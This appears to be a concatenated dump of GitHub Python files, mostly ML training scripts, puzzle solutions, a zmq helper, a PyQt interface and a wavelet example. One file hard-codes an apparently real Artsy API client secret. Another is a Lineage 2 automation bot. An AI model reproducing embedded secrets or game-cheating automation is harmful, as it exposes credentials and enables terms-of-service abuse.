初始学习率\n cfg.SOLVER.BASE_LR = 0.002\n\n cfg.SOLVER.MAX_ITER = (\n 100\n )\n cfg.MODEL.ROI_HEADS.BATCH_SIZE_PER_IMAGE = (\n 1\n )\n\n # 优化器动能\n cfg.SOLVER.MOMENTUM = 0.9\n #权重衰减\n cfg.SOLVER.WEIGHT_DECAY = 0.0001\n cfg.SOLVER.WEIGHT_DECAY_NORM = 0.0\n # 学习率衰减倍数\n cfg.SOLVER.GAMMA = 0.1\n # 迭代到指定次数,学习率进行衰减\n cfg.SOLVER.STEPS = (800,)\n # 在训练之前,会做一个热身运动,学习率慢慢增加初始学习率\n cfg.SOLVER.WARMUP_FACTOR = 1.0 / 1000\n # 热身迭代次数\n cfg.SOLVER.WARMUP_ITERS = 100\n\n cfg.SOLVER.WARMUP_METHOD = \"linear\"\n \n # 保存模型文件的命名数据减1\n cfg.SOLVER.CHECKPOINT_PERIOD = ITERS_IN_ONE_EPOCH - 1\n\n '''\n # 迭代到指定次数,进行一次评估\n cfg.TEST.EVAL_PERIOD = ITERS_IN_ONE_EPOCH\n #cfg.TEST.EVAL_PERIOD = 100\n\n #cfg.merge_from_file(args.config_file)\n #cfg.merge_from_list(args.opts)\n cfg.freeze()\n default_setup(cfg, args)\n return cfg\n\ndef main(args):\n cfg = setup(args)\n\n if args.eval_only:\n model = Trainer.build_model(cfg)\n DetectionCheckpointer(model, save_dir=cfg.OUTPUT_DIR).resume_or_load(\n cfg.MODEL.WEIGHTS, resume=args.resume\n )\n res = Trainer.test(cfg, model)\n if cfg.TEST.AUG.ENABLED:\n res.update(Trainer.test_with_TTA(cfg, model))\n if comm.is_main_process():\n verify_results(cfg, res)\n return res\n\n \"\"\"\n If you'd like to do anything fancier than the standard training logic,\n consider writing your own training loop (see plain_train_net.py) or\n subclassing the trainer.\n \"\"\"\n os.makedirs(cfg.OUTPUT_DIR, exist_ok=True)\n trainer = Trainer(cfg)\n trainer.resume_or_load(resume=args.resume)\n if cfg.TEST.AUG.ENABLED:\n trainer.register_hooks(\n [hooks.EvalHook(0, lambda: trainer.test_with_TTA(cfg, trainer.model))]\n )\n return trainer.train()\n\n\nif __name__ == \"__main__\":\n args = default_argument_parser().parse_args()\n print(\"Command Line Args:\", args)\n launch(\n main,\n args.num_gpus,\n num_machines=args.num_machines,\n machine_rank=args.machine_rank,\n dist_url=args.dist_url,\n args=(args,),\n )\n\n\n","repo_name":"Scottyoung99/ASL-Detection","sub_path":"TargetDetection/TargetDetection/TargetModels/mask/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":13084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73003551092","text":"import numpy as np\nimport pandas as pd\nimport yaml\nimport mlflow\nfrom mlflow.models import infer_signature\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.metrics import mean_squared_error\n\n\ndef train_model(\n features: pd.DataFrame, target: pd.Series, artifact_path: str, param: dict\n) -> mlflow.ActiveRun:\n \n # update model parameters\n with open(\"scripts/config/model_config.yml\", \"r\") as file:\n default_param = yaml.safe_load(file)\n model_param = {**default_param[\"random_forest\"], **param[\"model\"][\"param\"]}\n\n with mlflow.start_run() as run:\n # model creation\n model = get_power_forecaster(model_param)\n model.fit(X=features, y=target)\n predict = model.predict(features)\n rmse = compute_rmse(target.to_numpy(), predict)\n\n # model logging\n signature = infer_signature(features, predict)\n dataset = mlflow.data.from_pandas(\n features,\n source=param[\"input_data\"][\"location_path\"]\n )\n mlflow.log_input(dataset, context=\"training\")\n mlflow.log_params(model_param)\n mlflow.log_metric(\"rmse\", rmse)\n mlflow.sklearn.log_model(\n model, artifact_path=artifact_path, signature=signature\n )\n return run\n\n\ndef generate_features(df: pd.DataFrame) -> pd.DataFrame:\n return df[[\"cloudcover_low\", \"cloudcover_mid\", \"cloudcover_high\"]].assign(\n hour=lambda df: df.index.hour.astype(\"float\"),\n month=lambda df: df.index.month.astype(\"float\"),\n minutes=lambda df: 60.0 * df.index.hour + df.index.minute,\n day=lambda df: df.index.dayofyear.astype(\"float\"),\n )\n\n\ndef generate_target(df: pd.DataFrame) -> pd.Series | None:\n column_name = \"power\"\n if column_name in df.columns:\n return df[column_name]\n return None\n\n\ndef get_power_forecaster(param: dict) -> RandomForestRegressor:\n return RandomForestRegressor(**param)\n\n\ndef compute_rmse(y_true: np.array, y_pred: np.array) -> float:\n return np.sqrt(mean_squared_error(y_true, y_pred))\n","repo_name":"ahavrius/ml-pipeline","sub_path":"scripts/model_func.py","file_name":"model_func.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17904516652","text":"import numpy as np\nfrom fractions import gcd\n\ndef main():\n thres = 1000000\n low, high = 1800, 1850\n cond = getCentroid((low+high)/2) > thres\n auxcond = getCentroid((low+high)/2 -1) < thres\n\n while not (cond and auxcond):\n if cond:\n low = (low+high)/2\n else:\n high = (low+high)/2\n cond = getCentroid((low+high)/2) > thres\n auxcond = getCentroid((low+high)/2 -1) < thres\n print(\"The least value of M is: %d\") %(low+high)/2\n\ndef getCentroid(M):\n triples = genPrimitiveTriples(M, 2*M)\n \n count = 0\n for x in triples:\n K = min(M/x[0], 2*M/x[1])\n for k in xrange(1,K+1):\n a,b = k*x[0], k*x[1]\n #for i in xrange(1,a/2):\n # L,W,H = i,a-i,b\n # print (\"%d, %d, %d\") %(L,W,H)\n #if b/2>a:\n # for i in xrange(b/2, a+1):\n # L,W,H = b-i,i,a\n # print(\"%d, %d, %d\") %(L,W,H)\n if b <= M:\n num = a/2 if b/2>a else a/2 + b/2 - (b-a-1)\n else:\n num = 0 if b/2>a else b/2 - (b-a-1)\n count += num\n #print(\"[%d, %d, %d]: %d\") %(a,b,k*x[2],num)\n return count\n\n\ndef genPrimitiveTriples(A1,A2):\n \"\"\"Generate Pythagorean primitive triples using Euclid's formula:\n * a = m^2 - n^2\n * b = 2mn\n * c = m^2 + n^2\n Parameters\n ----------\n A1: int\n Maximum of shorter leg\n A2: int\n Maximum of longer leg\n \n Returns\n -------\n triples: list of tuples (int, int, int)\n All Pythagorean primitive triples\n \"\"\"\n triples = []\n M = A1 \n for m in xrange(2,M+1):\n for n in xrange(1,m):\n a,b,c = m*m-n*n, 2*m*n, m*m+n*n\n a,b = min(a,b), max(a,b)\n condition = min(a,b) < A1 and max(a,b) < A2\n if gcd(m,n)==1 and (m-n)%2 and condition:\n #print(\"[%d, %d]: (%d, %d, %d)\") %(m,n,m*m-n*n, 2*m*n, m*m+n*n)\n triples.append((a,b,c))\n return triples\n\n#thres = 1000000\n#low, high = 1800, 1850\n#cond = getCentroid((low+high)/2) > thres\n#auxcond = getCentroid((low+high)/2 -1) < thres\n#\n#while not (cond and auxcond):\n# if cond:\n# low = (low+high)/2\n# else:\n# high = (low+high)/2\n# cond = getCentroid((low+high)/2) > thres\n# auxcond = getCentroid((low+high)/2 -1) < thres\n#print(\"The least value of M is: %d\") % (low+high)/2\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kuol/Project_Euler","sub_path":"prob_086/prob_086.py","file_name":"prob_086.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10376105205","text":"def solution(ans):\n p = [[], [], []]\n while len(p[0]) < len(ans):\n for n in [1, 2, 3, 4, 5]:\n if len(p[0]) == len(ans):\n break\n p[0].append(n)\n for n in [2, 1, 2, 3, 2, 4, 2, 5]:\n if len(p[1]) == len(ans):\n break\n p[1].append(n)\n for n in [3, 3, 1, 1, 2, 2, 4, 4, 5, 5]:\n if len(p[2]) == len(ans):\n break\n p[2].append(n)\n \n scores = [0, 0, 0]\n for i in range(len(ans)):\n for j in range(3):\n if ans[i] == p[j][i]:\n scores[j] += 1\n \n answer = []\n max_score = max(scores)\n for i in range(len(scores)):\n if scores[i] == max_score:\n answer.append(i + 1)\n return answer","repo_name":"yejin7211/Algorithm","sub_path":"프로그래머스/lv1/42840. 모의고사/모의고사.py","file_name":"모의고사.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37856537265","text":"from __future__ import absolute_import\n\nimport time\n\nfrom ..io import descriptor\nimport zmq.backend\n\n\n__all__ = [\"wait_socks\"]\n\n\ndef wait_socks(sock_events, inmask=1, outmask=2, timeout=None):\n \"\"\"wait on a combination of zeromq sockets, normal sockets, and fds\n\n .. note:: this method can block\n\n it will return once there is relevant activity on any of the\n descriptors or sockets, or the timeout expires\n\n :param sock_events:\n two-tuples, the first item is either a zeromq socket, a socket, or a\n file descriptor, and the second item is a mask made up of the inmask\n and/or the outmask bitwise-ORd together\n :type sock_events: list\n :param inmask: the mask to use for readable events (default 1)\n :type inmask: int\n :param outmask: the mask to use for writable events (default 2)\n :type outmask: int\n :param timeout: the maximum time to block before raising an exception\n :type timeout: int, float or None\n\n :returns:\n a list of two-tuples, each has one of the first elements from\n ``sock_events``, the second element is the event mask of the activity\n that was detected (made up on inmask and/or outmask bitwise-ORd\n together)\n \"\"\"\n results = []\n for sock, mask in sock_events:\n if isinstance(sock, zmq.backend.Socket):\n mask = _check_events(sock, mask, inmask, outmask)\n if mask:\n results.append((sock, mask))\n if results:\n return results\n\n fd_map = {}\n fd_events = []\n for sock, mask in sock_events:\n if isinstance(sock, zmq.backend.Socket):\n fd = sock.getsockopt(zmq.FD)\n elif isinstance(sock, int):\n fd = sock\n else:\n fd = sock.fileno()\n\n fd_map[fd] = sock\n fd_events.append((fd, mask))\n\n while 1:\n started = time.time()\n active = descriptor.wait_fds(fd_events, inmask, outmask, timeout)\n if not active:\n # timed out\n return []\n\n results = []\n for fd, mask in active:\n sock = fd_map[fd]\n if isinstance(sock, zmq.backend.Socket):\n mask = _check_events(sock, mask, inmask, outmask)\n if not mask:\n continue\n results.append((sock, mask))\n\n if results:\n return results\n\n timeout -= time.time() - started\n\n\ndef _check_events(sock, mask, inmask=1, outmask=2):\n evs = sock.getsockopt(zmq.EVENTS)\n result = 0\n if evs & zmq.POLLIN and mask & inmask:\n result |= inmask\n if evs & zmq.POLLOUT and mask & outmask:\n result |= outmask\n return result\n","repo_name":"teepark/greenhouse","sub_path":"greenhouse/ext/zmq.py","file_name":"zmq.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"21"} +{"seq_id":"24300666843","text":"from chronicles.chronicle_settings import ChronicleSettings\nfrom logic.abstract_bot import AbstractBot\n\nBUTTON_SIT = \"0\"\nBUTTON_DROP = \"3\"\nBUTTON_ATTACK = \"1\"\nBUTTON_NEAREST_TARGET = \"6\"\nBUTTON_HEAL_POTION = \"8\"\nBUTTON_SPOIL = \"2\"\nBUTTON_SWEEP = \"4\"\n\n\nclass DwarvenFighterBot(AbstractBot):\n\n def __init__(self, chronicle_settings: ChronicleSettings):\n super().__init__(chronicle_settings)\n self.__spoil_used = False\n\n def actions_before_main(self):\n if self.get_self_hp() < 40:\n print(\"INFO: We need to relax\")\n if self.sit_until_heal(BUTTON_SIT):\n return True\n else:\n self.attack_target(BUTTON_ATTACK)\n return False\n\n def main_actions(self):\n return self.set_target_and_attack(BUTTON_ATTACK, BUTTON_NEAREST_TARGET)\n\n def actions_after_main(self):\n self.get_drop(BUTTON_DROP)\n\n def fail_actions(self, fail_count: int):\n if fail_count >= 5:\n self.move_random_location() # COMMENT THIS STRING IF NOT NEED MOVE\n return True\n elif 1 < fail_count < 5:\n self.rotate_right()\n return False\n else:\n return False\n\n def actions_while_attack(self, target_hp: int, self_hp: int):\n if self_hp <= 20:\n self.use_skill(BUTTON_HEAL_POTION)\n if not self.__spoil_used and target_hp < 80:\n self.use_skill(BUTTON_SPOIL)\n self.__spoil_used = True\n\n def actions_on_target_death(self):\n self.use_skill(BUTTON_SWEEP)\n self.__spoil_used = False\n\n","repo_name":"CkimiHoK/Lineage2_Clicker_Bot","sub_path":"logic/classes/dwarven_fighter.py","file_name":"dwarven_fighter.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"40814950845","text":"import numpy\n\nfrom scipy.interpolate import spline, lagrange\nfrom math import tan\nfrom scipy.integrate import quad\n\nx = numpy.array([-1.0, -0.96, -0.86, -0.79, 0.22, 0.5, 0.93])\nfx = numpy.array([-1.0, -0.151, 0.894, 0.986, 0.895, 0.5, -0.306])\n\n\ndef getXk(k):\n return -1 + 0.1 * k\n\n\nxk = numpy.array([])\nfor i in range(1, 20):\n xk = numpy.append(xk, getXk(i))\n\nsplineResult = spline(x, fx, xk)\nlagrangeResult = lagrange(x, fx)\n\nfor i in range(0, 19):\n print(\"Xk = \" + str(xk[i])),\n print(\":\\t SPLINE: \" + str(splineResult[i])),\n print (\"\\tLAGRANGE: \" + str(lagrangeResult(xk[i]))),\n print (\" \\t S - L: \" + str(float(splineResult[i] - lagrangeResult(xk[i]))))\n\nquanc8Result = quad(lambda num: tan(num) / num, 1, 2)\nprint (\"integral for quanc8: \" + str(quanc8Result))\n","repo_name":"bmendli/computational-mathematics-labs","sub_path":"computational-mathematics-py/lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8371455244","text":"from PyQt6.QtWidgets import QMainWindow, QSplitter, QMenu, QMenuBar\nfrom PyQt6.QtGui import QKeySequence\nfrom .WorkingSpace import WorkingSpace\nfrom .ControlTreeView import ControlTreeView\nfrom writers.SettingsWriter import edit_default_settings\nclass MainView(QMainWindow):\n \"\"\"\n Implements relACs user interface.\n \"\"\"\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"RelACs\")\n self.setObjectName(\"MainWindow\")\n\n \n self.splitter = QSplitter()\n \n self.working_space = WorkingSpace()\n self.control_tree: ControlTreeView = ControlTreeView(self.working_space)\n \n self.splitter.addWidget(self.control_tree)\n self.splitter.addWidget(self.working_space)\n self.splitter.setStretchFactor(0,6)\n self.splitter.setStretchFactor(1,9)\n\n self.menubar = QMenuBar(self)\n \n self.menuSettings = QMenu(self.menubar)\n self.menuSettings.setObjectName(\"menuSettings\")\n self.menuSettings.setTitle(\"Settings\")\n self.menuSettings.addAction(\"Default Settings\", edit_default_settings)\n self.menubar.addAction(self.menuSettings.menuAction())\n\n self.menuSettings = QMenu(self.menubar)\n self.menuSettings.setTitle(\"File\")\n self.menuSettings.addAction(\"Save\", self.control_tree.compounds.save)\n self.menuSettings.addAction(\"Save as ...\", self.control_tree.compounds.save_to_json)\n self.menubar.addAction(self.menuSettings.menuAction())\n self.setMenuBar(self.menubar)\n\n\n self.menuSettings = QMenu(self.menubar)\n self.menuSettings.setTitle(\"Undo/Redo\")\n self.menuSettings.addAction(\"Undo | Ctrl+Z\", self.try_undo)\n self.menuSettings.addAction(\"Redo | Ctrl+Y\", self.try_redo)\n self.menubar.addAction(self.menuSettings.menuAction())\n self.setMenuBar(self.menubar)\n\n self.setCentralWidget(self.splitter)\n\n def try_redo(self):\n try:\n self.working_space.currentWidget().on_redo() \n except Exception as e:\n pass\n\n def try_undo(self):\n try:\n self.working_space.currentWidget().on_undo() \n except Exception as e:\n pass\n\n ","repo_name":"ZychuDev/relACs","sub_path":"views/MainView.py","file_name":"MainView.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42217818034","text":"import requests\n\nclient_id = '43e63a41d246d6b8028b'\nclient_secret = 'f95bcdbdc757ca39b0802f0545e9bf58'\n\ndef get_token():\n url = 'https://api.artsy.net/api/tokens/xapp_token'\n data = {\n 'client_id': client_id,\n 'client_secret': client_secret\n }\n response = requests.post(url, data=data)\n return response.json()['token']\n\ndef get_genes(token):\n url = 'https://api.artsy.net/api/genes/'\n headers = {\n 'X-Xapp-Token': token\n }\n response = requests.get(url, headers=headers)\n if response.status_code == 200:\n return response.json()\n else:\n return 'Error' + str(response.status_code)\n\ndef get_impressionistic_paintings(token):\n url = 'https://api.artsy.net/api/search?q=impressionism+more:pagemap:metatags-og_type:artwork'\n headers = {\n 'X-Xapp-Token': token\n }\n response = requests.get(url, headers=headers)\n if response.status_code == 200:\n return response.json()\n else:\n return 'Error' + str(response.status_code)\n\ntoken = get_token()\ngenes = get_impressionistic_paintings(token)\nprint(genes)\n","repo_name":"koljapluemer/inspirationbot","sub_path":"archive/artsy.py","file_name":"artsy.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37546511987","text":"'''\r\nCreated on Jan 24, 2017\r\n\r\n@author: kautilya.save\r\n'''\r\n\r\n\r\n\r\nscores=[(1489,\"Sean\"), (2850,\"Bob\"), (276,\"Crap Player\"), (78495, \"Great Player\"), (8473, \"Damian\"), (4860, \"Andy\"), (0, \"Stephen\")]\r\nscores2=[(1489,\"Sean\"), (2850,\"Bob\"), (276,\"Crap Player\"), (78495, \"Great Player\"), (8473, \"Damian\"), (4860, \"Andy\"), (0, \"Stephen\")]\r\nscores.sort(reverse= True)\r\n\r\nscores2.sort()\r\nprint(scores)\r\nprint(scores2)","repo_name":"SensehacK/playgrounds","sub_path":"python/PF/Intro/Day5/tuple.py","file_name":"tuple.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37216903681","text":"class Solution:\n def frequencySort(self, s: str) -> str: # O( K*NlogN | N) K is the distinct letter count in the s\n counter = defaultdict(lambda : 0)\n for c in s:\n counter[c] += 1 \n lst = sorted(set(counter.values()), reverse = True ) # remove dups from the counter list\n output = \"\"\n for t in lst:\n for k, v in counter.items():\n if t == v:\n output += k*v\n return output\n\n\n\n\n\n\n# previous solution\n\n# class Solution:\n# def frequencySort(self, s: str) -> str:\n# hmp = {}\n# for c in s:\n# if c not in hmp: \n# hmp[c] = 0 \n# hmp[c]+=1 \n \n# counter = {} \n# for k, v in hmp.items():\n# if v not in counter:\n# counter[v] = []\n# counter[v].append(k)\n \n# output = \"\"\n# for k in sorted(counter.keys(), reverse = True):\n# for i in counter[k]:\n# output += k*i\n# return output\n\n\n\n# previous approach\n# class Solution:\n# def frequencySort(self, s: str) -> str:\n# hmp = {}\n# for c in s:\n# if c not in hmp:\n# hmp[c] = 0\n# hmp[c] += 1\n# for_sort = []\n# for k, v in hmp.items():\n# for_sort.append([k, v])\n# output = \"\"\n# for s in sorted(for_sort, key=lambda x: x[1], reverse=True):\n# output += s[0] * s[1]\n# return output\n\n# OLD Solution\n# def frequencySort(s: str):\n# if len(s) ==0:\n# return \"\"\n# map = {}\n# for i in s:\n# if i not in map:\n# map[i] = 0\n# map[i]+=1\n# output = \"\"\n# t = [None]*(max(map.values())+1) #bucket sort\n# for i in map.values():\n# t[i] = i\n#\n#\n# for i in t[::-1]:\n# if i!= None:\n# for k,v in map.items():\n# if v == i:\n# output+= k*v\n# map[k] = -1\n#\n#\n# return output\n#\n#\n# print(frequencySort(\"tree\"))\n# print(frequencySort(\"cccaaa\"))\n# print(frequencySort(\"Aabb\"))\n# print(frequencySort(\"\"))\n# print(frequencySort(\"AA\"))\n# print(frequencySort(\"A\"))\n\n","repo_name":"renjieliu/leetcode","sub_path":"0001_0599/451.py","file_name":"451.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"37440918726","text":"#\n# [25] Reverse Nodes in k-Group\n#\n# https://leetcode.com/problems/reverse-nodes-in-k-group/description/\n#\n# algorithms\n# Hard (31.70%)\n# Total Accepted: 123.7K\n# Total Submissions: 390.2K\n# Testcase Example: '[1,2,3,4,5]\\n2'\n#\n# Given a linked list, reverse the nodes of a linked list k at a time and\n# return its modified list.\n# \n# k is a positive integer and is less than or equal to the length of the linked\n# list. If the number of nodes is not a multiple of k then left-out nodes in\n# the end should remain as it is.\n# \n# You may not alter the values in the nodes, only nodes itself may be changed.\n# \n# Only constant memory is allowed.\n# \n# For example,\n# Given this linked list: 1->2->3->4->5\n# \n# For k = 2, you should return: 2->1->4->3->5\n# \n# For k = 3, you should return: 3->2->1->4->5\n# \n#\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def reverseKGroup(self, head, k):\n \"\"\"\n :type head: ListNode\n :type k: int\n :rtype: ListNode\n \"\"\"\n ii = 0\n tail = head\n stack = []\n while (ii < k):\n if tail == None:\n break\n ii = ii + 1\n stack.append(tail)\n tail = tail.next # tail not included\n if ii < k:\n return head\n head = stack.pop()\n ptr = head\n while len(stack) != 0:\n ptr.next = stack.pop()\n ptr = ptr.next\n ptr.next = self.reverseKGroup(tail, k)\n return head\n","repo_name":"zhiymatt/Leetcode","sub_path":"Python/25.reverse-nodes-in-k-group.131452194.ac.py","file_name":"25.reverse-nodes-in-k-group.131452194.ac.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74240673653","text":"from collections import deque\nimport heapq\n\nclass Animal:\n def __init__(self, name, age):\n self.name = name\n self.age = age\n self.order = 0\n\n def is_order_than(self, animal):\n return self.order < animal.order\n\nclass Dog(Animal):\n def __repr__(self):\n return \"Dog named {0} (age {1})\".format(self.name, self.age)\n\nclass Cat(Animal):\n def __repr__(self):\n return \"Cat named {0} (age {1})\".format(self.name, self.age)\n\nclass AnimalShelter:\n def add_animal(self, animal):\n raise NotImplementedError\n\n def get_dog(self):\n raise NotImplementedError\n\n def get_cat(self):\n raise NotImplementedError\n\n def get_any(self):\n raise NotImplementedError\n\nclass ArrivalBasedAnimalShelter(AnimalShelter):\n def __init__(self):\n self.dogs = deque()\n self.cats = deque()\n self.order = 0\n\n def add_animal(self, animal):\n animal.order = self.order\n self.order += 1\n if isinstance(animal, Dog):\n self.dogs.append(animal)\n elif isinstance(animal, Cat):\n self.cats.append(animal)\n\n def get_dog(self):\n return self.dogs.popleft() if self.dogs else None\n\n def get_cat(self):\n return self.cats.popleft() if self.cats else None\n\n def get_any(self):\n if not self.dogs:\n return self.get_cat()\n if not self.cats:\n return self.get_dog()\n\n if self.dogs[0].is_order_than(self.cats[0]):\n return self.get_dog()\n else:\n return self.get_cat()\n\nclass AgeBasedAnimalShelter(AnimalShelter):\n def __init__(self):\n self.dogs = []\n self.cats = []\n self.order = 0\n\n def add_animal(self, animal):\n animal.order = self.order\n self.order += 1\n if isinstance(animal, Dog):\n heapq.heappush(self.dogs, (-animal.age, animal.order, animal))\n elif isinstance(animal, Cat):\n heapq.heappush(self.cats, (-animal.age, animal.order, animal))\n\n def get_dog(self):\n return heapq.heappop(self.dogs)[-1] if self.dogs else None\n\n def get_cat(self):\n return heapq.heappop(self.cats)[-1] if self.cats else None\n\n def get_any(self):\n if not self.dogs:\n return self.get_cat()\n if not self.cats:\n return self.get_dog()\n\n dog = self.dogs[0]\n cat = self.cats[0]\n\n print(dog)\n print(cat)\n if (-dog[0], dog[1]) < (-cat[0], cat[1]):\n return self.get_dog()\n else:\n return self.get_cat()\n\ndef test_shelters():\n # Testing ArrivalBasedAnimalShelter\n arrival_shelter = ArrivalBasedAnimalShelter()\n\n dog1 = Dog(\"Buddy\", 5)\n cat1 = Cat(\"Whiskers\", 3)\n dog2 = Dog(\"Rex\", 7)\n cat2 = Cat(\"Mittens\", 2)\n\n arrival_shelter.add_animal(dog1)\n arrival_shelter.add_animal(cat1)\n arrival_shelter.add_animal(dog2)\n arrival_shelter.add_animal(cat2)\n\n assert arrival_shelter.get_any() == dog1\n assert arrival_shelter.get_dog() == dog2\n assert arrival_shelter.get_cat() == cat1\n assert arrival_shelter.get_any() == cat2\n\n # Testing AgeBasedAnimalShelter\n age_shelter = AgeBasedAnimalShelter()\n\n dog3 = Dog(\"Bruno\", 6)#1\n cat3 = Cat(\"Kitty\", 4)#2\n dog4 = Dog(\"Max\", 4)#3\n cat4 = Cat(\"Luna\", 6)#4\n\n age_shelter.add_animal(dog3)\n age_shelter.add_animal(cat3)\n age_shelter.add_animal(dog4)\n age_shelter.add_animal(cat4)\n\n assert age_shelter.get_any() == dog3 # Because Luna is the oldest at 6 years.\n assert age_shelter.get_dog() == dog4 # Because Bruno is older than Max.\n assert age_shelter.get_cat() == cat4\n assert age_shelter.get_any() == cat3\n\n print(\"All tests passed!\")\n\ntest_shelters()\n","repo_name":"Echozqn/energyTest","sub_path":"B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34092057114","text":"\"\"\"\nThis module provides examples demonstrating the WWZ by looking at a simple signal (2 Hz).\n\nPlease select whether to run in parallel or not.\nThere are 'linear' method and 'octave' method.\ncurrent example showcases both methods\n\nNOTE: The WWZ shows better information on frequency and WWA shows better information on amplitude.\n\"\"\"\n\nimport time\n\n# noinspection Mypy\nimport matplotlib.pyplot as plt\n# noinspection Mypy\nimport numpy as np\nimport libwwz.wwz as wwz\nimport libwwz.plot_methods as wwz_plot\n\n# Select Mode...\nparallel = True\n\n# number of time\nntau = 20 # Creates new time with this many divisions.\n\n# linear\nfreq_low = 1\nfreq_high = 5\nfreq_steps = 0.2 # Resolution of frequency steps\nfreq_lin = [freq_low, freq_high, freq_steps]\n\n# octave\nfreq_target = 2\nfreq_low = 0.5\nfreq_high = 6.5\nband_order = 3\nlog_scale_base = 10**(3/10)\noverride = False\nfreq_oct = [freq_target, freq_low, freq_high, band_order, log_scale_base, override]\n\n# decay constant (c < 0.02) where c = 1/(2*w^2)\n# The analyzing wavelet decays significantly in a single cycle 2*pi/w, where w = 2*pi*f\nf = 2\nw = 2 * np.pi * f\nc = 1/(2*w**2)\n\n# Code to remove data points at random\n\ndef remove_fraction_with_seed(data, fraction, seed=np.random.randint(1)):\n \"\"\"\n removes fraction of data at random with given seed.\n :param data: data to remove\n :param fraction: fraction to remove\n :param seed: seed for randomness\n :return: data with fraction removed\n \"\"\"\n n_to_remove = int(len(data) * fraction)\n np.random.seed(seed)\n\n return np.delete(data, np.random.choice(np.arange(len(data)), n_to_remove, replace=False))\n\n\ndef run_examples() -> None:\n \"\"\"\n An example of WWZ/WWA using a sine function time series with missing data will be shown.\n \"\"\"\n\n # Set timestamps\n sample_freq = 80\n timestamp = np.arange(0, 60, 1 / sample_freq)\n\n # Create simple signal (2hz)\n sine_2hz = np.sin(timestamp * 2 * (2 * np.pi))\n simple_signal = sine_2hz\n\n # Remove 80% of the signal at random\n simple_removed = remove_fraction_with_seed(simple_signal, 0.8)\n timestamp_removed = remove_fraction_with_seed(timestamp, 0.8)\n\n # Get the WWZ/WWA of the signals (linear)\n # 'linear'\n starttime = time.time()\n WWZ_simple_linear = wwz.wwt(timestamp, simple_signal, ntau, freq_lin, c, 'linear')\n print(round(time.time() - starttime, 2), 'seconds has passed (finished WWZ_simple_linear)')\n WWZ_simple_removed_linear = wwz.wwt(timestamp_removed, simple_removed, ntau, freq_lin, c, 'linear')\n print(round(time.time() - starttime, 2), 'seconds has passed (finished WWZ_simple_removed_linear)')\n\n # 'octave'\n WWZ_simple_octave = wwz.wwt(timestamp, simple_signal, ntau, freq_oct, c, 'octave')\n print(round(time.time() - starttime, 2), 'seconds has passed (finished WWZ_simple_octave)')\n WWZ_simple_removed_octave = wwz.wwt(timestamp_removed, simple_removed, ntau, freq_oct, c, 'octave')\n print(round(time.time() - starttime, 2), 'seconds has passed (finished WWZ_simple_removed_octave)')\n\n # Plot\n plt.rcParams[\"figure.figsize\"] = [14, 6]\n plt.rcParams.update({'font.size': 14})\n\n # Plot of base functions\n plt.figure(0)\n plt.plot(timestamp, simple_signal, '-')\n plt.plot(timestamp_removed, simple_removed, 'o')\n plt.ylabel(\"simple (count)\")\n plt.legend(['full', 'removed'], loc=1, fontsize=10)\n plt.xlabel(\"time (s)\")\n plt.suptitle('The simple signal (2 Hz)')\n\n # Plot of WWZ for simple and simple removed\n # 'linear'\n fig, ax = plt.subplots(nrows=2, ncols=2)\n wwz_plot.linear_plotter(ax=ax[0, 0],\n TAU=WWZ_simple_linear[0],\n FREQ=WWZ_simple_linear[1],\n DATA=WWZ_simple_linear[2])\n ax[0, 0].set_ylabel('full data (Hz)')\n ax[0, 0].set_xticks([])\n ax[0, 0].set_yticks([1, 2, 3, 4, 5])\n ax[0, 0].set_title('WWZ')\n\n wwz_plot.linear_plotter(ax=ax[1, 0],\n TAU=WWZ_simple_removed_linear[0],\n FREQ=WWZ_simple_removed_linear[1],\n DATA=WWZ_simple_removed_linear[2])\n ax[1, 0].set_ylabel('removed data (Hz)')\n ax[1, 0].set_xlabel('time (s)')\n ax[1, 0].set_yticks([1, 2, 3, 4, 5])\n\n # Plot of WWA for the same signal\n wwz_plot.linear_plotter(ax=ax[0, 1],\n TAU=WWZ_simple_linear[0],\n FREQ=WWZ_simple_linear[1],\n DATA=WWZ_simple_linear[3])\n ax[0, 1].set_title('WWA')\n ax[0, 1].set_xticks([])\n ax[0, 1].set_yticks([])\n\n wwz_plot.linear_plotter(ax=ax[1, 1],\n TAU=WWZ_simple_removed_linear[0],\n FREQ=WWZ_simple_removed_linear[1],\n DATA=WWZ_simple_removed_linear[3])\n ax[1, 1].set_xlabel('time (s)')\n ax[1, 1].set_yticks([])\n plt.suptitle('Linear Method')\n 